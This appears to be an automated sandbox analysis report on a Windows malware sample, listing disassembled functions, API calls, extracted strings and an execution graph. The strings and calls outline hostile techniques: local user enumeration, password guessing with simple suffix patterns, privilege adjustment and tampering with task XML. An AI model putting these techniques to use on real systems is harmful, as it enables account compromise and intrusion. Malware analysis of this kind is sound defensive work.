                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1ED13576E0021A8FCB18CF99C9815AEFBB2FF98310F25956AD815BB704D734A911CF94
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction ID: 661d4224e0226a62dc5565bcde94e6aa946e1ef99945e038f73d7b47cfba27f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7917371D01215AFDB50EFA5C840B9EB7B5AF88304F26847EE805B7381D738AD11CBA8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                              • String ID: 00-->$<Actions
                                                                                                                                                                                                              • API String ID: 3028510665-1934172683
                                                                                                                                                                                                              • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,?,76A8DB30), ref: 00403060
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                              • String ID: cmd.exe
                                                                                                                                                                                                              • API String ID: 2839743307-723907552
                                                                                                                                                                                                              • Opcode ID: c83219c8b1fcc2364968f814fc3d8ceb50f78c4147f13553458a25b82dac8a32
                                                                                                                                                                                                              • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c83219c8b1fcc2364968f814fc3d8ceb50f78c4147f13553458a25b82dac8a32
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,76A8DB30), ref: 00401EC6
                                                                                                                                                                                                              • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,76A8DB30), ref: 00401EE2
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                              • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                              • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                              • String ID: %s1$%s12$%s123
                                                                                                                                                                                                              • API String ID: 1588441251-2882894844
                                                                                                                                                                                                              • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112,?,?,00402E9C), ref: 004028D9
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                              • String ID: PnSw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3001685711-2911081799
                                                                                                                                                                                                              • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,75B8E610,00402FDE), ref: 0040300F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,75B8E610,00402FDE), ref: 0040302B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2629017576-0
                                                                                                                                                                                                              • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,76A8DB30), ref: 004015CF
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              • Opcode ID: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction ID: d18670d365493a771e2935c97cc000c5a2e18494483a7794571357713e5f98ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4111C6B25043106BD310EF55DC4899BBBD8EBE9361F04453AFA55A3290E335D9448BEA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:3.3%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:85.7%
                                                                                                                                                                                                              Signature Coverage:18.5%
                                                                                                                                                                                                              Total number of Nodes:1100
                                                                                                                                                                                                              Total number of Limit Nodes:25
83406->83405 83408 26696a8 83407->83408 83416 2669734 83407->83416 83410 2669707 GetProcessHeap HeapValidate 83408->83410 83411 26696e3 GetProcessHeap HeapValidate 83408->83411 83408->83416 83417 26681d0 83408->83417 83410->83408 83414 266971d GetProcessHeap HeapFree 83410->83414 83411->83410 83413 26696f7 GetProcessHeap HeapFree 83411->83413 83413->83410 83414->83408 83415 2669754 83415->83394 83416->83415 83516 26685d0 83416->83516 83418 2668ab0 8 API calls 83417->83418 83419 26681e5 83418->83419 83420 2668ab0 8 API calls 83419->83420 83421 26681f6 83420->83421 83422 2668ab0 8 API calls 83421->83422 83423 2668207 83422->83423 83424 2668ab0 8 API calls 83423->83424 83425 2668218 83424->83425 83426 2668ab0 8 API calls 83425->83426 83427 266822b 83426->83427 83428 2668ab0 8 API calls 83427->83428 83429 266823f 83428->83429 83430 2668ab0 8 API calls 83429->83430 83431 2668253 83430->83431 83432 2668ab0 8 API calls 83431->83432 83433 2668267 83432->83433 83434 2668ab0 8 API calls 83433->83434 83435 266827b 83434->83435 83436 2668ab0 8 API calls 83435->83436 83437 266828f 83436->83437 83438 2668ab0 8 API calls 83437->83438 83439 26682a3 83438->83439 83440 2668ab0 8 API calls 83439->83440 83441 26682b7 83440->83441 83442 2668ab0 8 API calls 83441->83442 83443 26682cb 83442->83443 83444 2668ab0 8 API calls 83443->83444 83445 26682df 83444->83445 83446 2668ab0 8 API calls 83445->83446 83447 26682f3 83446->83447 83448 2668ab0 8 API calls 83447->83448 83449 2668307 83448->83449 83450 2668ab0 8 API calls 83449->83450 83451 266831b 83450->83451 83452 2668ab0 8 API calls 83451->83452 83453 266832f 83452->83453 83454 2668ab0 8 API calls 83453->83454 83455 2668343 83454->83455 83456 2668ab0 8 API calls 83455->83456 83457 2668357 83456->83457 83458 2668ab0 8 API calls 83457->83458 83459 266836b 83458->83459 83460 2668ab0 8 API calls 83459->83460 83461 266837f 83460->83461 83462 2668ab0 8 API calls 83461->83462 83463 2668393 83462->83463 83464 2668ab0 8 API calls 83463->83464 
83465 26683a7 83464->83465 83466 2668ab0 8 API calls 83465->83466 83467 26683bb 83466->83467 83468 2668ab0 8 API calls 83467->83468 83469 26683cf 83468->83469 83470 2668ab0 8 API calls 83469->83470 83471 26683e3 83470->83471 83472 2668ab0 8 API calls 83471->83472 83473 26683f7 83472->83473 83474 2668ab0 8 API calls 83473->83474 83475 266840b 83474->83475 83476 2668ab0 8 API calls 83475->83476 83477 2668421 83476->83477 83478 2668ab0 8 API calls 83477->83478 83479 2668435 83478->83479 83480 2668ab0 8 API calls 83479->83480 83481 266844b 83480->83481 83482 2668ab0 8 API calls 83481->83482 83483 266845f 83482->83483 83484 2668ab0 8 API calls 83483->83484 83485 2668475 83484->83485 83486 2668ab0 8 API calls 83485->83486 83487 2668489 83486->83487 83488 2668ab0 8 API calls 83487->83488 83489 266849d 83488->83489 83490 2668ab0 8 API calls 83489->83490 83491 26684b1 83490->83491 83492 2668ab0 8 API calls 83491->83492 83493 26684c5 83492->83493 83494 2668ab0 8 API calls 83493->83494 83495 26684d9 83494->83495 83496 2668ab0 8 API calls 83495->83496 83497 26684ed 83496->83497 83498 2668ab0 8 API calls 83497->83498 83499 2668501 83498->83499 83500 2668ab0 8 API calls 83499->83500 83501 2668515 83500->83501 83502 2668ab0 8 API calls 83501->83502 83503 2668529 83502->83503 83504 2668ab0 8 API calls 83503->83504 83505 266853d 83504->83505 83506 2668ab0 8 API calls 83505->83506 83507 2668551 83506->83507 83508 2668ab0 8 API calls 83507->83508 83509 2668565 83508->83509 83510 266857b 83509->83510 83511 2668ab0 8 API calls 83509->83511 83512 26685b1 83510->83512 83513 2668596 83510->83513 83514 2668ab0 8 API calls 83510->83514 83511->83510 83512->83408 83513->83512 83515 2668ab0 8 API calls 83513->83515 83514->83513 83515->83512 83517 2668ab0 8 API calls 83516->83517 83518 26685e9 83517->83518 83519 2668ab0 8 API calls 83518->83519 83520 26685fa 83519->83520 83521 2668ab0 8 API calls 83520->83521 83522 266860b 83521->83522 83523 2668ab0 8 API calls 83522->83523 83524 266861c 
